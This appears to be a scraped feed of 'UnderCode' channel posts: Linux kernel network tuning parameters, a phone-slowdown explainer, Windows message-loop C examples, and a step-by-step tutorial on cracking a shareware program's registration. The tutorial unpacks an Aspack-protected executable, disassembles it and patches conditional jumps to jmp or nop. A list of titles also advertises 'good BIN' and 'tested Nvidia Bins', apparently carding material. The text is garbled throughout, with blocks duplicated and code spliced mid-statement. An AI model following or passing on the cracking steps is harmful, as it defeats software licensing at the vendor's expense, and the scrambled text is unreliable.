2) ip_dynaddr: This parameter is usually used in the case of a dial-up connection, which can enable the system to change the source address of an ip packet to that ip address immediately, at the same time interrupt the original TCP session and resend a syn request packet with a new address Start a new TCP conversation. When using IP spoofing, this parameter can immediately change the spoofed address to the new IP address. The parameter values of this parameter can be:
1: Enable the function
2 : Enable the function using the redundant mode
0: Disable the function
π¦ Application Example: When using ipchains to configure IP spoofing to drive a LAN to share a ppp connection to the Internet, sometimes it just appears When a site fails to connect, refresh and connect again, you can set the value of this parameter to 1, and immediately change the masqueraded address to the new IP address, which can solve this kind of problem. The command is:
echo "1"> / proc / sys / net / ipv4 / ip_dynaddr
3) ip_forward: This parameter can be used to enable the packet forwarding function, so that the system acts as a router. When the parameter value is 1, IP forwarding is enabled; when it is 0, IP forwarding is disabled. Note that we can implement IP forwarding on hosts with single or dual network cards.
Application example:
Suppose we use a Linux host with dual network cards as the firewall. At this time we must execute the following command to enable the ip forwarding function:
echo "1"> / proc / sys / net / ipv4 / ip_forward
4) ip_local_port_range: Set the port range used when the local system initiates a TCP or UDP connection request. The setting value is two integers and the default is "1024 4999".
Application example:
echo "1450 6000"> / proc / sys / net / ipv4 / ip_local_port_range
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦speedup net linux speed- IP related kernel configuration parameters The
twitter.com/UndercodeTC
π¦ ππΌππ πππΈβπ :
ip configuration parameters in the linux kernel network parameters are usually used to define or adjust some specific parameters of the ip packet. In addition, it also defines some network characteristics of the system.
1) ip_default_ttl: set the lifetime of the ip packet sent from the machine, the parameter value is an integer, the range is 0 to 128, the default value is 64. In Windows systems, the lifetime of IP packets is usually 128. If your system often receives "Time to live exceeded" icmp response, you can increase the value of this parameter appropriately, but it should not be too large, because if your route is bad, it will increase the system error time.
2) ip_dynaddr: This parameter is usually used in the case of a dial-up connection, which can enable the system to change the source address of an ip packet to that ip address immediately, at the same time interrupt the original TCP session and resend a syn request packet with a new address Start a new TCP conversation. When using IP spoofing, this parameter can immediately change the spoofed address to the new IP address. The parameter values of this parameter can be:
1: Enable the function
2 : Enable the function using the redundant mode
0: Disable the function
π¦ Application Example: When using ipchains to configure IP spoofing to drive a LAN to share a ppp connection to the Internet, sometimes it just appears When a site fails to connect, refresh and connect again, you can set the value of this parameter to 1, and immediately change the masqueraded address to the new IP address, which can solve this kind of problem. The command is:
echo "1"> / proc / sys / net / ipv4 / ip_dynaddr
3) ip_forward: This parameter can be used to enable the packet forwarding function, so that the system acts as a router. When the parameter value is 1, IP forwarding is enabled; when it is 0, IP forwarding is disabled. Note that we can implement IP forwarding on hosts with single or dual network cards.
Application example:
Suppose we use a Linux host with dual network cards as the firewall. At this time we must execute the following command to enable the ip forwarding function:
echo "1"> / proc / sys / net / ipv4 / ip_forward
4) ip_local_port_range: Set the port range used when the local system initiates a TCP or UDP connection request. The setting value is two integers and the default is "1024 4999".
Application example:
echo "1450 6000"> / proc / sys / net / ipv4 / ip_local_port_range
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦speedup linux net tips- Kernel network parameters
T.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
for each network interface Through the kernel network parameters for each network interface, you can specify the response kernel network parameters for specific network interfaces such as eth0, eth1, and so on. Note: The parameters under / proc / sys / net / ipv4 / conf / all / will apply to all network interfaces.
1) accept_redirects: This parameter is located in / proc / sys / net / ipv4 / conf / DEV / accept_redirects (DEV stands for the specific network interface). If your host has two routers in the network segment, you can set one of them Becomes the default gateway, but when the gateway receives your ip packet and finds that the ip packet must pass through another router, the router will then send you a so-called "redirect" icmp packet to tell the ip packet Forward to another router. The parameter value is Boolean, 1 means to receive such redirected icmp information, 0 means to ignore. The default value is 0 on the Linux host acting as the router, and the default value is 1 on the general Linux host. It is recommended to change it to 0 or use "Security Redirection" (see below) to eliminate security risks.
2) log_martians: logs IP packets containing illegal address information to the kernel log. The parameter value is a Boolean value.
Applications:
We talked about the rp_filter reverse path filtering parameter. At the same time, we can execute the following statement
echo "1"> / proc / sys / net / ipv4 / conf / all / log_martians
and then record the ip spoofed ip packets to var / log / messages.
3) forwarding: enable the IP forwarding function of the specific network interface. The parameter value is a Boolean value, and 1 means logging.
Application example:
echo "1"> / proc / sys / net / ipv4 / conf / eth0 / forwarding
4) accept_source_route: Whether to accept IP packets containing source routing information. The parameter value is Boolean, 1 means accept, 0 means not accept. The default value is 1 on the Linux host acting as the gateway, and 0 on the general Linux host. From a security perspective, we recommend that you turn off this feature.
5) secure_redirects: We have already mentioned the concept of "secure redirects". In fact, the so-called "secure redirects" only accept "redirect" icmp packets from the gateway. This parameter is used to set the "safe redirect" function. The parameter value is a Boolean value, 1 means enabled, 0 means disabled, and the default value is enabled.
6) proxy_arp: Set whether to relay arp packets on the network. The parameter value is Boolean, 1 means relay, 0 means ignore, and the default value is 0. This parameter is usually only useful for linux hosts acting as routers.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦speedup linux net tips- Kernel network parameters
T.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
for each network interface Through the kernel network parameters for each network interface, you can specify the response kernel network parameters for specific network interfaces such as eth0, eth1, and so on. Note: The parameters under / proc / sys / net / ipv4 / conf / all / will apply to all network interfaces.
1) accept_redirects: This parameter is located in / proc / sys / net / ipv4 / conf / DEV / accept_redirects (DEV stands for the specific network interface). If your host has two routers in the network segment, you can set one of them Becomes the default gateway, but when the gateway receives your ip packet and finds that the ip packet must pass through another router, the router will then send you a so-called "redirect" icmp packet to tell the ip packet Forward to another router. The parameter value is Boolean, 1 means to receive such redirected icmp information, 0 means to ignore. The default value is 0 on the Linux host acting as the router, and the default value is 1 on the general Linux host. It is recommended to change it to 0 or use "Security Redirection" (see below) to eliminate security risks.
2) log_martians: logs IP packets containing illegal address information to the kernel log. The parameter value is a Boolean value.
Applications:
We talked about the rp_filter reverse path filtering parameter. At the same time, we can execute the following statement
echo "1"> / proc / sys / net / ipv4 / conf / all / log_martians
and then record the ip spoofed ip packets to var / log / messages.
3) forwarding: enable the IP forwarding function of the specific network interface. The parameter value is a Boolean value, and 1 means logging.
Application example:
echo "1"> / proc / sys / net / ipv4 / conf / eth0 / forwarding
4) accept_source_route: Whether to accept IP packets containing source routing information. The parameter value is Boolean, 1 means accept, 0 means not accept. The default value is 1 on the Linux host acting as the gateway, and 0 on the general Linux host. From a security perspective, we recommend that you turn off this feature.
5) secure_redirects: We have already mentioned the concept of "secure redirects". In fact, the so-called "secure redirects" only accept "redirect" icmp packets from the gateway. This parameter is used to set the "safe redirect" function. The parameter value is a Boolean value, 1 means enabled, 0 means disabled, and the default value is enabled.
6) proxy_arp: Set whether to relay arp packets on the network. The parameter value is Boolean, 1 means relay, 0 means ignore, and the default value is 0. This parameter is usually only useful for linux hosts acting as routers.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ The phone is slowing down. Can cleaning up the garbage fix the freeze? (IPhone / Android analysis)
t.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
1) cleaning up RAM
What is RAM? You can imagine that RAM is a temporary storage space. The more apps you open and the heavier a single app, the larger the RAM space occupied. When the RAM is full, the phone will become very stuttered. (That is, it doesn't make sense to have as much space before the RAM is full).
2) cleaning up the cache
The so-called cache is that the app temporarily stores some content in your phone space so that you do nβt need to download it again the next time you read it; for example, photos from the LINE group, some photos you have already seen, you need to re-read When you see it, just click it to open it; but if it is a photo you have nβt seen, you have to wait for it to be downloaded before you can see it.
3) hard disk space
Needless to say hard disk space? It is the capacity of iPhone / Android phones. Although GB is the same as RAM, most mobile phones do not support virtual memory, which means that the space not used by your hard disk is not allocated to RAM.
4) Clean up mobile trash, the difference is in capacity
Imagine that your mobile phone is a car. Cleaning up mobile phone trash is like removing garbage and dust from the car; it will increase the capacity, but it does not affect the speed. The reason for the real speed is RAM and the processor.
π¦Tips :
If you still feel that your phone is stuck, it may not be the cause of "junk", but the app you use will become more and more resourceful with time updates.
After all, software developers always want more and more functions, so software is becoming more and more efficient.
So, I really feel that the mobile phone is very stuck. Perhaps the most direct and cruel solution is ... it's time to change a mobile phone; clean up the trash and regain the phone? I'm afraid it's difficult.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ The phone is slowing down. Can cleaning up the garbage fix the freeze? (IPhone / Android analysis)
t.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
1) cleaning up RAM
What is RAM? You can imagine that RAM is a temporary storage space. The more apps you open and the heavier a single app, the larger the RAM space occupied. When the RAM is full, the phone will become very stuttered. (That is, it doesn't make sense to have as much space before the RAM is full).
2) cleaning up the cache
The so-called cache is that the app temporarily stores some content in your phone space so that you do nβt need to download it again the next time you read it; for example, photos from the LINE group, some photos you have already seen, you need to re-read When you see it, just click it to open it; but if it is a photo you have nβt seen, you have to wait for it to be downloaded before you can see it.
3) hard disk space
Needless to say hard disk space? It is the capacity of iPhone / Android phones. Although GB is the same as RAM, most mobile phones do not support virtual memory, which means that the space not used by your hard disk is not allocated to RAM.
4) Clean up mobile trash, the difference is in capacity
Imagine that your mobile phone is a car. Cleaning up mobile phone trash is like removing garbage and dust from the car; it will increase the capacity, but it does not affect the speed. The reason for the real speed is RAM and the processor.
π¦Tips :
If you still feel that your phone is stuck, it may not be the cause of "junk", but the app you use will become more and more resourceful with time updates.
After all, software developers always want more and more functions, so software is becoming more and more efficient.
So, I really feel that the mobile phone is very stuck. Perhaps the most direct and cruel solution is ... it's time to change a mobile phone; clean up the trash and regain the phone? I'm afraid it's difficult.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦from today-posted one :
> Speed optimization-enable hard disk DMA support
> good BIN WWE NETWORT
>Speed optimization-read and write on memory
> Can you read the ID number from the bank card, do you believe it?
Can you read the ID number from your bank card?
> cvs service-ViewCVS install Howto full by undercode
> LINUX NET SPEED- Overview of Tuning Methods for Tuning Linux Network Performance
> speedup net linux speed- IP related kernel configuration parameters The
> speedup linux net tips- Kernel network parameters
> tested 5xGeforce Nvidia Bins
> The phone is slowing down. Can cleaning up the garbage fix the freeze? (IPhone / Android analysis)
@UnderCodeTesting - e n j o y
> Speed optimization-enable hard disk DMA support
> good BIN WWE NETWORT
>Speed optimization-read and write on memory
> Can you read the ID number from the bank card, do you believe it?
Can you read the ID number from your bank card?
> cvs service-ViewCVS install Howto full by undercode
> LINUX NET SPEED- Overview of Tuning Methods for Tuning Linux Network Performance
> speedup net linux speed- IP related kernel configuration parameters The
> speedup linux net tips- Kernel network parameters
> tested 5xGeforce Nvidia Bins
> The phone is slowing down. Can cleaning up the garbage fix the freeze? (IPhone / Android analysis)
@UnderCodeTesting - e n j o y
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Window, thread, superclass, subclass Full by Undercode
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Windows and messages for Windows are discussed for completeness of the narrative, and processes and threads are briefly discussed. Subclassing and Superclassing are two methods of reusing code that accompany the Windows window mechanism. Don't confuse "subclassing, superclassing" with derived and base classes in object-oriented languages. The "class" in "subclassing and superclassing" refers to the window class of Windows.
2) The system establishes a message queue for a windowed thread. A thread with a message queue can receive messages. For example, we can use the PostThreadMessage function to send messages to threads.
As long as a windowless thread calls PeekMessage or GetMessage, the system will also create a message queue for it.
π¦ Windows and messages
1) Message queue for threads
Each running program is a process. Each process has one or more threads. Some threads have no windows, and some threads have one or more windows.
We can send messages to threads, but most messages are sent to windows. Messages sent to the window are also placed in the thread's message queue. We can think of the thread's message queue as a mailbox and the window as a recipient. When we send a message to a specified window, the system will find the thread to which the window belongs, and then put the message in the thread's message queue.
Thread message queue is a data structure inside the system, we can't see this structure in the program. But we can send and deliver messages to the message queue through the Windows API; receive messages from the message queue; transform and dispatch the received messages.
2) The smallest Windows program
Windows programmers have probably seen such a minimal Windows program:
// Example 1
#include "windows.h"
static const char m_szName [] = "window";
If the main window callback function directly uses DefWindowProc, the message loop will not end when the window is closed
static LRESULT CALLBACK WindowProc (HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
switch (uMsg)
{
case WM_DESTROY: PostQuitMessage (0); // End the message loop by sending a WM_QUIT message when the window is closed
break;
default: return DefWindowProc (hWnd, uMsg, wParam, lParam);
}
return 0;
}
main function
int __stdcall WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
WNDCLASS wc;
memset (& wc, 0, sizeof (WNDCLASS));
wc.style = CS_VREDRAW | CS_HREDRAW;
wc.lpfnWndProc = (WNDPROC) WindowProc;
wc.hCursor = LoadCursor (NULL, IDC_ARROW);
wc.hbrBackground = (HBRUSH) (COLOR_WINDOW);
wc.lpszClassName = m_szName;
RegisterClass (& wc); // Register window class
HWND hWnd;
hWnd = CreateWindow (m_szName, m_szName, WS_OVERLAPPEDWINDOW, 100,100,320,240, NULL, NULL, hInstance, NULL); // Create window
ShowWindow (hWnd, nCmdShow); // show window
MSG sMsg;
while (int ret = GetMessage (& sMsg, NULL, 0, 0))
{
// message loop
if (ret! = -1)
{
TranslateMessage (& sMsg);
DispatchMessage (& sMsg);
}
}
return 0;
}
3) Although this program only displays a window, it is often used to explain the basic structure of Windows programs. We can also find a similar program structure inside the MFC framework. This app contains the following basic concepts:
Window class, the window procedure and a window message loop
following were introduced.
4) Window Classes, Windows, and Window Procedures
When creating a window, provide the name of the window class. A window class is equivalent to a window template. We can create multiple windows based on the same window class . We can use the windows class registered in Windows in advance. But in more cases, we want to register our own window class . When registering window classes, we need to register items such as name, style, icon, cursor, menu, etc. The most important of these is the address of the window procedure.
5) The window procedure is a function.
π¦ Window, thread, superclass, subclass Full by Undercode
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Windows and messages for Windows are discussed for completeness of the narrative, and processes and threads are briefly discussed. Subclassing and Superclassing are two methods of reusing code that accompany the Windows window mechanism. Don't confuse "subclassing, superclassing" with derived and base classes in object-oriented languages. The "class" in "subclassing and superclassing" refers to the window class of Windows.
2) The system establishes a message queue for a windowed thread. A thread with a message queue can receive messages. For example, we can use the PostThreadMessage function to send messages to threads.
As long as a windowless thread calls PeekMessage or GetMessage, the system will also create a message queue for it.
π¦ Windows and messages
1) Message queue for threads
Each running program is a process. Each process has one or more threads. Some threads have no windows, and some threads have one or more windows.
We can send messages to threads, but most messages are sent to windows. Messages sent to the window are also placed in the thread's message queue. We can think of the thread's message queue as a mailbox and the window as a recipient. When we send a message to a specified window, the system will find the thread to which the window belongs, and then put the message in the thread's message queue.
Thread message queue is a data structure inside the system, we can't see this structure in the program. But we can send and deliver messages to the message queue through the Windows API; receive messages from the message queue; transform and dispatch the received messages.
2) The smallest Windows program
Windows programmers have probably seen such a minimal Windows program:
// Example 1
#include "windows.h"
static const char m_szName [] = "window";
If the main window callback function directly uses DefWindowProc, the message loop will not end when the window is closed
static LRESULT CALLBACK WindowProc (HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
switch (uMsg)
{
case WM_DESTROY: PostQuitMessage (0); // End the message loop by sending a WM_QUIT message when the window is closed
break;
default: return DefWindowProc (hWnd, uMsg, wParam, lParam);
}
return 0;
}
main function
int __stdcall WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
WNDCLASS wc;
memset (& wc, 0, sizeof (WNDCLASS));
wc.style = CS_VREDRAW | CS_HREDRAW;
wc.lpfnWndProc = (WNDPROC) WindowProc;
wc.hCursor = LoadCursor (NULL, IDC_ARROW);
wc.hbrBackground = (HBRUSH) (COLOR_WINDOW);
wc.lpszClassName = m_szName;
RegisterClass (& wc); // Register window class
HWND hWnd;
hWnd = CreateWindow (m_szName, m_szName, WS_OVERLAPPEDWINDOW, 100,100,320,240, NULL, NULL, hInstance, NULL); // Create window
ShowWindow (hWnd, nCmdShow); // show window
MSG sMsg;
while (int ret = GetMessage (& sMsg, NULL, 0, 0))
{
// message loop
if (ret! = -1)
{
TranslateMessage (& sMsg);
DispatchMessage (& sMsg);
}
}
return 0;
}
3) Although this program only displays a window, it is often used to explain the basic structure of Windows programs. We can also find a similar program structure inside the MFC framework. This app contains the following basic concepts:
Window class, the window procedure and a window message loop
following were introduced.
4) Window Classes, Windows, and Window Procedures
When creating a window, provide the name of the window class. A window class is equivalent to a window template. We can create multiple windows based on the same window class . We can use the windows class registered in Windows in advance. But in more cases, we want to register our own window class . When registering window classes, we need to register items such as name, style, icon, cursor, menu, etc. The most important of these is the address of the window procedure.
5) The window procedure is a function.
All messages received by the window will be sent to this function for processing. So, how is the message sent to the thread message queue sent to the window?
6) Message loop programmers familiar with embedded multitasking programs know that the structure of tasks (equivalent to Windows threads) is basically:
while (1) {wait for signal; process signal;} The task receives the signal and processes it, otherwise it hangs and lets other tasks run. This is the basic structure of a message driver. Windows programs usually do the same:
while (int ret = GetMessage (& sMsg, NULL, 0, 0)) {// message loop if (ret! = -1) {TranslateMessage (& sMsg); DispatchMessage (& sMsg);}}
GetMessage receives a message from a message queue; TranslateMessage generates a WM_CHAR message according to the key press and puts it into the message queue ; DispatchMessage dispatches the message to the window according to the window handle in the message, that is, calls the window procedure function to process the message .
7) Communicating by Message
The function that creates a window returns a window handle. The window handle identifies a unique window instance system-wide (not process-wide). By sending messages to the window, we can achieve in-process and inter-process communication.
We can use SendMessage or PostMessage to send or post messages to the window. SendMessage must wait until the target window has processed the message before returning. I tried: If SendMessage is sent to a window without a message loop, the SendMessage function will never return. PostMessage returns immediately after putting the message in the thread's message queue.
In fact, only delivered messages are dispatched to the window procedure via DispatchMessage. The message sent via SendMessage is already dispatched to the window procedure when the thread GetMessage, without going through DispatchMessage.
π¦ Example of communication between window program and console program Do
you think "routine 1" is meaningless? Let's use it to make a small game: let "routine 1" make a close contact with a console program. We first modify the window procedure of "Routine 1" to:
static LRESULT CALLBACK WindowProc (HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
static DWORD tid = 0;
switch (uMsg)
{
case WM_DESTROY:
PostQuitMessage (0); // End the message loop by sending a WM_QUIT message when the window is closed
break;
case WM_USER:
tid = wParam; // Save the thread ID of the console program
SetWindowText (hWnd, "Received");
break;
case WM_CHAR:
if (tid)
{
switch (wParam)
{
case '1': PostThreadMessage (tid, WM_USER + 1, 0, 0); // Send a message to the console program 1
break;
case '2': PostThreadMessage (tid, WM_USER + 2, 0, 0); // Send a message to the console program 2
break;
}
}
break;
default:
return DefWindowProc (hWnd, uMsg, wParam, lParam);
}
return 0;
} Then, we create a console program with the following code:
#include "windows.h
"#include" stdio.h "
static HWND m_hWnd = 0;
void process_msg (UINT msg, WPARAM wp, LPARAM lp)
{
char buf [100];
static int i = 1;
if (! m_hWnd)
{return;}
switch (msg)
{
case WM_USER + 1:
SendMessage (m_hWnd, WM_GETTEXT, sizeof (buf), (LPARAM) buf);
printf ("You are now called:% s \ n \ n", buf); // read and display the name of the other party
break;
case WM_USER + 2:
sprintf (buf, "I am a window% d", i ++);
SendMessage (m_hWnd, WM_SETTEXT, sizeof (buf), (LPARAM) buf); // modify the name of the other party
printf ("renamed you \ n \ n");
break;
}
}
int main ()
{
MSG sMsg;
printf ("Start with thread id% d \ n", GetCurrentThreadId ());
m_hWnd = FindWindow (NULL, "window");
if (m_hWnd)
{
printf ("Found window% x \ n \ n", m_hWnd);
SendMessage (m_hWnd, WM_USER, GetCurrentThreadId (), 0);
}
else
{
printf ("No window found \ n \ n");
}
while (int ret = GetMessage (& sMsg, NULL, 0, 0))
{
// message loop
if (ret! = -1)
{
process_msg (sMsg.
6) Message loop programmers familiar with embedded multitasking programs know that the structure of tasks (equivalent to Windows threads) is basically:
while (1) {wait for signal; process signal;} The task receives the signal and processes it, otherwise it hangs and lets other tasks run. This is the basic structure of a message driver. Windows programs usually do the same:
while (int ret = GetMessage (& sMsg, NULL, 0, 0)) {// message loop if (ret! = -1) {TranslateMessage (& sMsg); DispatchMessage (& sMsg);}}
GetMessage receives a message from a message queue; TranslateMessage generates a WM_CHAR message according to the key press and puts it into the message queue ; DispatchMessage dispatches the message to the window according to the window handle in the message, that is, calls the window procedure function to process the message .
7) Communicating by Message
The function that creates a window returns a window handle. The window handle identifies a unique window instance system-wide (not process-wide). By sending messages to the window, we can achieve in-process and inter-process communication.
We can use SendMessage or PostMessage to send or post messages to the window. SendMessage must wait until the target window has processed the message before returning. I tried: If SendMessage is sent to a window without a message loop, the SendMessage function will never return. PostMessage returns immediately after putting the message in the thread's message queue.
In fact, only delivered messages are dispatched to the window procedure via DispatchMessage. The message sent via SendMessage is already dispatched to the window procedure when the thread GetMessage, without going through DispatchMessage.
π¦ Example of communication between window program and console program Do
you think "routine 1" is meaningless? Let's use it to make a small game: let "routine 1" make a close contact with a console program. We first modify the window procedure of "Routine 1" to:
static LRESULT CALLBACK WindowProc (HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
static DWORD tid = 0;
switch (uMsg)
{
case WM_DESTROY:
PostQuitMessage (0); // End the message loop by sending a WM_QUIT message when the window is closed
break;
case WM_USER:
tid = wParam; // Save the thread ID of the console program
SetWindowText (hWnd, "Received");
break;
case WM_CHAR:
if (tid)
{
switch (wParam)
{
case '1': PostThreadMessage (tid, WM_USER + 1, 0, 0); // Send a message to the console program 1
break;
case '2': PostThreadMessage (tid, WM_USER + 2, 0, 0); // Send a message to the console program 2
break;
}
}
break;
default:
return DefWindowProc (hWnd, uMsg, wParam, lParam);
}
return 0;
} Then, we create a console program with the following code:
#include "windows.h
"#include" stdio.h "
static HWND m_hWnd = 0;
void process_msg (UINT msg, WPARAM wp, LPARAM lp)
{
char buf [100];
static int i = 1;
if (! m_hWnd)
{return;}
switch (msg)
{
case WM_USER + 1:
SendMessage (m_hWnd, WM_GETTEXT, sizeof (buf), (LPARAM) buf);
printf ("You are now called:% s \ n \ n", buf); // read and display the name of the other party
break;
case WM_USER + 2:
sprintf (buf, "I am a window% d", i ++);
SendMessage (m_hWnd, WM_SETTEXT, sizeof (buf), (LPARAM) buf); // modify the name of the other party
printf ("renamed you \ n \ n");
break;
}
}
int main ()
{
MSG sMsg;
printf ("Start with thread id% d \ n", GetCurrentThreadId ());
m_hWnd = FindWindow (NULL, "window");
if (m_hWnd)
{
printf ("Found window% x \ n \ n", m_hWnd);
SendMessage (m_hWnd, WM_USER, GetCurrentThreadId (), 0);
}
else
{
printf ("No window found \ n \ n");
}
while (int ret = GetMessage (& sMsg, NULL, 0, 0))
{
// message loop
if (ret! = -1)
{
process_msg (sMsg.
message, sMsg.wParam, sMsg.lParam);
}
}
return 0;
}
7) Can everyone understand how to play this game? Run "routine 1" wnd first, then run the console program msg. msg will find the window of wnd and send its main thread ID to wnd. After receiving the msg message, wnd will display it. At this point, wnd and msg have established communication channels: wnd can send messages to msg's main thread, and msg can send messages to wnd's window.
8) If we press the key '1' in the wnd window, wnd will send message 1 to msg. After receiving msg, we will get the window name of wnd and display it through WM_GETTEXT message. If we press the key '2' in the wnd window, wnd will send message 2 to msg. After receiving msg, we will modify the window name of wnd through the WM_SETTEXT message.
9) This small example demonstrates the message loop of a console program, sending messages to threads, and communicating messages between processes.
10) The problem of address space
Different processes have independent address spaces. If we include the address of a process A in the message parameters, then send it to process B. If process B operates on this address in its own address space, an error will occur. So why does WM_GETTEXT and WM_SETEXT in the above example work properly?
This is because WM_GETTEXT and WM_SETEXT are messages defined by Windows itself. Windows knows the meaning of the parameters and does special processing, that is, allocate a block of memory in the space of process B as a relay, and in the buffer of process A and process B Copy data from time to time. For example: In the example in Section 1.5.1, if we set a breakpoint to observe, we will find that lParam in the WM_SETTEXT message sent by msg is not equal to lParam in the WM_SETTEXT message received by wnd.
11) If we pass the memory address in the message defined by ourselves, the system will not do any special processing, so an error must occur.
Windows provides a WM_COPYDATA message to pass data to the window, and Windows also does special processing for this message.
12) When sending messages between processes that require additional memory allocation, we should use SendMessage instead of PostMessage. Because SendMessage will wait for the receiver to finish processing before returning, so the system will have the opportunity to release the allocated memory. If PostMessage is used in this case, the system will ignore the message that needs to be delivered. The reader can experiment with it in the msg program.
π¦ Subclassing and superclassing A
window class is a template for a window, and a window is an instance of a window class. Window class and
temporarily)
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
}
}
return 0;
}
7) Can everyone understand how to play this game? Run "routine 1" wnd first, then run the console program msg. msg will find the window of wnd and send its main thread ID to wnd. After receiving the msg message, wnd will display it. At this point, wnd and msg have established communication channels: wnd can send messages to msg's main thread, and msg can send messages to wnd's window.
8) If we press the key '1' in the wnd window, wnd will send message 1 to msg. After receiving msg, we will get the window name of wnd and display it through WM_GETTEXT message. If we press the key '2' in the wnd window, wnd will send message 2 to msg. After receiving msg, we will modify the window name of wnd through the WM_SETTEXT message.
9) This small example demonstrates the message loop of a console program, sending messages to threads, and communicating messages between processes.
10) The problem of address space
Different processes have independent address spaces. If we include the address of a process A in the message parameters, then send it to process B. If process B operates on this address in its own address space, an error will occur. So why does WM_GETTEXT and WM_SETEXT in the above example work properly?
This is because WM_GETTEXT and WM_SETEXT are messages defined by Windows itself. Windows knows the meaning of the parameters and does special processing, that is, allocate a block of memory in the space of process B as a relay, and in the buffer of process A and process B Copy data from time to time. For example: In the example in Section 1.5.1, if we set a breakpoint to observe, we will find that lParam in the WM_SETTEXT message sent by msg is not equal to lParam in the WM_SETTEXT message received by wnd.
11) If we pass the memory address in the message defined by ourselves, the system will not do any special processing, so an error must occur.
Windows provides a WM_COPYDATA message to pass data to the window, and Windows also does special processing for this message.
12) When sending messages between processes that require additional memory allocation, we should use SendMessage instead of PostMessage. Because SendMessage will wait for the receiver to finish processing before returning, so the system will have the opportunity to release the allocated memory. If PostMessage is used in this case, the system will ignore the message that needs to be delivered. The reader can experiment with it in the msg program.
π¦ Subclassing and superclassing A
window class is a template for a window, and a window is an instance of a window class. Window class and
temporarily)
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ how to crack the software registration code full by UnderCode :
twitter.com/undercodeNews :
π¦ ππΌππ πππΈβπ :
for who have never been exposed to software cracking or programming.
> Let βs start today βs crack,
> The software I want to crack: The software needed for the network form terminator to
1) shell language.exe
2) shelling AspackDie.exe
3) decompile W32Dasm gold - version
hex editor UltraEdit.rar
π¦ Review the basics before cracking:
I. Cracked Level
> Beginner, modify the program, modify the exe file with ultraedit, called brute force cracking, referred to as blasting
intermediate,@ undercodeTesting chase the registration code of the software
advanced, write the registration machine
π¦ General steps for cracking with w32dasm:
1) Look at the software manual, what is the difference between software registration and non-registration, and how to register
2) Run this software, try to enter your name and any registration code to register, what are the error messages, and the error messages Write it down
3) Detect if there is shelling .
4) pw32dasmgold disassembly
5) Find the error message or the correct message may be correct mouse button
6) pw32dasmgold main window corresponding assembler analysis, to identify the key and key jump Call
7) the green light of the stop key in the jump, jump to find the key offset address at the bottom of the main window pw32dasmgold (actually modify the address)
8) Using ultraedit to find the offset address (actually modify the address) modify the machine code and save
π¦ The concept of the shell: copyright information needs to be protected, do not want others to change it, exe executable file compression, the most common shell software ASPACK, UPX, PEcompact
> Unpacking: Get a software to detect its shell, and then we need to unpack its shell to restore its original appearance. If it is not packed, it will not be necessary to unpack it. Unpacking software unaspack, caspr, upx, unpecompact, procdump
> Actually modify address (offset address) and the row address (virtual address) pw32dasmgold out disassembly code consists of three columns
of the first column of the row address (virtual address)
> in the second column machine code (modified in the final modified ultraedit)
the third column Assembly instruction
1) First column Second column Third column
: 0041BE38 2B45F0 sub eax, dword ptr [ebp-10]
: 0041BE3B 6A42 push 00000042
: 0041BE3D 50 push eax
: 0041BE3E FF75F4 push [ebp-0C]
: 0041BE41 FF75F0 push [ebp-10]
: 0041BE44 FF35A8AB4400 push dword ptr [0044ABA8]
2) Different modification methods
for two different situations :
a) Modify to jmp
je (jne, jz, jnz) => jmp corresponding machine code EB (the first jump found in the error message upward) jmp's role is to jump absolutely and unconditionally To skip the error message below
b) Modify to nop
je (jne, jz, jnz) => nop corresponding machine code 90 (the first jump found with the correct information upward) The role of nop is to erase this jump, make this jump invalid, and lose Function, so that the program smoothly comes to the correct information immediately following it.
π¦ Alright, let's start our cracking journey. . . . . . . . . .
1) Investigate the shell: First open the language.exe of the detect shell, and select Open ---- find the network fill-in terminator to be cracked: FormGhost.exe, click OK, as shown in Figure 1. language.exe shows that the software shell is: Aspack
2) Unpacking: Double-click the unpacked AspackDie.exe, a dialog box appears, select the network form filling terminator: FormGhost.exe, and open
3) Terminate the form in the network: FormGhost.exe generates an unpacked.exe file in the same directory. This is the unpacked FormGhost.exe.
4) start disassembly: open the decompile W32Dasm Gold-official version is chineese version, select disassembly-open the unpacked.exe after unpacking, and start to load
5) start to modify the software: open the hexadecimal editor UltraEdit.
π¦ how to crack the software registration code full by UnderCode :
twitter.com/undercodeNews :
π¦ ππΌππ πππΈβπ :
for who have never been exposed to software cracking or programming.
> Let βs start today βs crack,
> The software I want to crack: The software needed for the network form terminator to
1) shell language.exe
2) shelling AspackDie.exe
3) decompile W32Dasm gold - version
hex editor UltraEdit.rar
π¦ Review the basics before cracking:
I. Cracked Level
> Beginner, modify the program, modify the exe file with ultraedit, called brute force cracking, referred to as blasting
intermediate,@ undercodeTesting chase the registration code of the software
advanced, write the registration machine
π¦ General steps for cracking with w32dasm:
1) Look at the software manual, what is the difference between software registration and non-registration, and how to register
2) Run this software, try to enter your name and any registration code to register, what are the error messages, and the error messages Write it down
